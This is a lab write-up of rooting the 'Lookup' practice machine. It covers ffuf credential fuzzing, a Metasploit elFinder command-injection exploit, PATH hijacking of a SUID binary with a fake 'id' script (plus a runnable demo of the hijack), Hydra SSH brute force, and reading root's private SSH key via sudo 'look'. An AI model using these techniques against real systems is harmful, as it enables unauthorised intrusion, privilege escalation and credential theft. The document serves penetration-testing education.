Lookup

Test your enumeration skills on this boot-to-root machine.

There is a login page that is supposed to be bypassed.

  1. I ran a TCP scan with Nmap, but the results were of no use.

  2. I also did subdomain and directory enumeration, but neither of them had anything useful.

  3. I ran separate username and password fuzzing scans with ffuf against the login page and found the following credentials: username jose, password password123.

  4. Upon logging in, I was redirected to files.lookup.thm, which was a file manager.

  5. elFinder 2.1.47 was running on the system.

  6. I looked for an exploit on ExploitDB and found one at https://www.exploit-db.com/exploits/46481, but getting it to work was giving me trouble, so I switched to Metasploit and used its elFinder command-injection module, which gave me a meterpreter session on the target as www-data.

  7. From there, I looked for a privilege-escalation path. www-data had no sudo rights, no obviously exploitable binaries turned up, and I couldn't read the password hashes in /etc/shadow. Everything was locked down.

  8. I looked for SUID binaries with find / -perm -u=s -type f 2>/dev/null and found one that stood out: /usr/sbin/pwm.

  9. I ran it, and its output showed that it was executing the id command to work out which user had called it.

  10. Cherry on top, the binary was SUID root, so whatever it executed ran with root privileges. That made it worth working with.

  11. I went for PATH hijacking. pwm calls id without an absolute path, so the shell resolves it by walking PATH. For our fake id to win, the tmp directory has to come before /usr/bin, so it must be prepended rather than appended: export PATH=/tmp:$PATH

  12. With that in place, any bare id invocation from pwm would run our custom script in /tmp instead of the real /usr/bin/id.

  13. I used the following custom script to trick pwm into dumping another user's passwords. It was saved as /tmp/id and made executable with chmod +x /tmp/id so that pwm would find and run it.

#!/bin/bash
# Fake id: pretend the caller is the user think.
echo "uid=33(think) gid=33(think) groups=33(think)"

I had already seen from the home directory that think was a user on the system, which is why the fake id reports that name.

  14. Running pwm with the fake id in PATH printed a huge list of passwords.
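The following is an added example and not part of the original walkthrough. It reproduces the PATH hijack from steps 8 to 14 against a constructed stand-in for pwm (a small script that, like pwm, calls a bare `id`), so the mechanics can be checked on any Linux box without the target. It also shows why the order matters: appending the fake directory (PATH=$PATH:/tmp) leaves the real /usr/bin/id in front, while prepending it (PATH=/tmp:$PATH) is what actually redirects the lookup. Paths and the stub are assumptions for the demo, not the real binary.

```shell
#!/usr/bin/env bash
# Added example: PATH hijack of a program that calls `id` by bare name.
# The "pwm_stub" below is a constructed stand-in, not the real /usr/sbin/pwm.
set -u

workdir=$(mktemp -d)
trap 'rm -rf "$workdir"' EXIT
fakebin="$workdir/fakebin"          # plays the role of /tmp on the target
mkdir -p "$fakebin"

# Stand-in for the SUID binary: resolves the caller with a bare `id`,
# so the lookup goes through PATH and can be hijacked.
cat > "$workdir/pwm_stub" <<'EOF'
#!/bin/sh
user=$(id | sed 's/^uid=[0-9]*(\([^)]*\)).*/\1/')
echo "running pwm as $user"
EOF
chmod +x "$workdir/pwm_stub"

# The fake id from the walkthrough, saved under the name pwm searches for.
cat > "$fakebin/id" <<'EOF'
#!/bin/sh
echo "uid=33(think) gid=33(think) groups=33(think)"
EOF
chmod +x "$fakebin/id"

# Appending: /usr/bin/id is still found first, the hijack does nothing.
run_with_appended_path() {
  PATH="$PATH:$fakebin" "$workdir/pwm_stub"
}

# Prepending: the fake id is first in the search order, pwm now believes
# it was called by think.
run_with_prepended_path() {
  PATH="$fakebin:$PATH" "$workdir/pwm_stub"
}

echo "appended : $(run_with_appended_path)"
echo "prepended: $(run_with_prepended_path)"
```

On the real target the same difference decides whether pwm lists your own (www-data) passwords or think's, which is why the export in step 11 has to put /tmp first.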

  15. I then used Hydra to brute-force SSH for the think user, with the passwords I had obtained saved as the wordlist passlist.txt. Note that a password list needs the uppercase -P flag (lowercase -p is a single password). The command was:

hydra -l think -P passlist.txt 10.10.30.29 ssh

  16. The password was found, and I connected via SSH as think.

  17. I ran sudo -l and found that I could run /usr/bin/look as root.

  18. GTFOBins fortunately had a file-read entry for /usr/bin/look. An empty search string matches every line, so the whole file is printed:

LFILE=file_to_read
# '' is the prefix to search for; every line begins with the empty string
sudo look '' "$LFILE"
  19. Now I could read any file on the system as root. To get a proper root shell, I used it to pull root's SSH private key:

sudo look '' /root/.ssh/id_rsa

  20. This printed root's private key, which I saved locally as id_rsa.

  21. Using that key, I could log in over SSH as root (the key file needs chmod 600 or ssh will refuse it):

ssh root@10.10.30.29 -i id_rsa

Bingo, the privileges were escalated to root, and the root flag was obtained.
